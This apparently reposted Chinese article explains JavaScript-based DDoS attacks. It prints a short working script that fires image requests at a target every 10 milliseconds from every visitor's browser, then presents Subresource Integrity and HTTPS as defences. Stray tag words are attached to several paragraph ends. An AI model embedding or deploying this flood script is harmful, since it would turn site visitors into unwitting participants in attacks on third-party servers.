前端-DDoS攻擊

下面的腳本(略有修改)就會向受害網站發送大量的請求:php

function imgflood() {   
  var TARGET = 'example.com'  
  var URI = '/index.php?'  
  var pic = new Image()  
  var rand = Math.floor(Math.random() * 1000)  
  pic.src = 'http://'+TARGET+URI+rand+'=val'  
}  
setInterval(imgflood, 10)  

該腳本會在目標網頁上生成一個圖片按鈕,圖片按鈕會指向「example.com」 網站。只要用戶訪問了含有該腳本的網頁,那麼他就會成爲 「example.com」DDoS攻擊中的一員。瀏覽器發出的每個請求都是有效請求,因而該攻擊又變成了Layer 7 攻擊。前端

若是攻擊者在一個網站中嵌入了惡意JavaScript腳本,那麼該網站的每個訪客都將成爲DDoS攻擊中的一員。網站流量越高就意味着DDoS越嚴重。jquery

預防:瀏覽器

<script src="https://code.jquery.com/jquery-1.10.2.min.js">              # 在前端代碼里加上這個

瀏覽器會自動下載該.js文件,而且會不分青紅皁白的運行它。即便該文件中被攻擊者注入了惡意腳本,瀏覽器也不會識別。然而若是網站發現了哈希值驗證腳本不匹配,子資源完整性(SRI)會告訴瀏覽器不要運行該腳本。服務器

<script src="https://code.jquery.com/jquery-1.10.2.min.js"    
        integrity="sha256-C6CB9UYIS9UJeqinPHWTHVqh/E1uhG5Twh+Y5qFQmYg="  
         crossorigin="anonymous">  

建議網站管理員將添加這一標籤添加到服務器上,用以保護其用戶不被利用。dom

位於瀏覽器和服務器間的中間人能夠任意修改數據,包括更改HTML內容或者JavaScript腳本。而若是中間人走偏了,作了一些惡意的事情,如向頁面中添加惡意JavaScript並執行,那後果同樣很嚴重 (也就是所謂的中間人攻擊)。網站

基於JavaScript的DDOS攻擊愈來愈頻發,防護這一攻擊的惟一方式是全面啓用HTTPS。

參考連接:https://blog.csdn.net/momo_mutou/article/details/49948437spa

相關文章
相關標籤/搜索